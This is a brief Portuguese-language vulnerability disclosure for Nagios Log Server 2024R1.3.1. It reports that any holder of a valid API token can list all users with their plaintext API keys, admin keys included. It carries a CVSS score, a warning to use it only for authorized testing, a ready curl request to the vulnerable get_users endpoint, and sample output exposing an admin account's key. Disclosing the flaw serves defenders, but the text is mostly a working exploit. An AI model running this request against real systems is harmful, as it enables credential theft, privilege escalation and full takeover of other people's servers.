
Exposição de Chave de API Autenticada no Nagios Log Server 2024R1.3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:HApenas para pesquisa e testes autorizados. Não utilize contra sistemas sem permissão.
Uma vulnerabilidade a nível de API no Nagios Log Server 2024R1.3.1 permite que qualquer utilizador com um token de API válido recupere uma lista completa de contas de utilizador juntamente com as suas chaves de API em texto simples, incluindo credenciais de administrador. Esta falha permite enumeração de utilizadores, escalada de privilégios e comprometimento total do sistema através do uso não autorizado de tokens expostos.
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
[
{
"name": "devadmin",
"username": "devadmin",
"email": "[email protected]",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]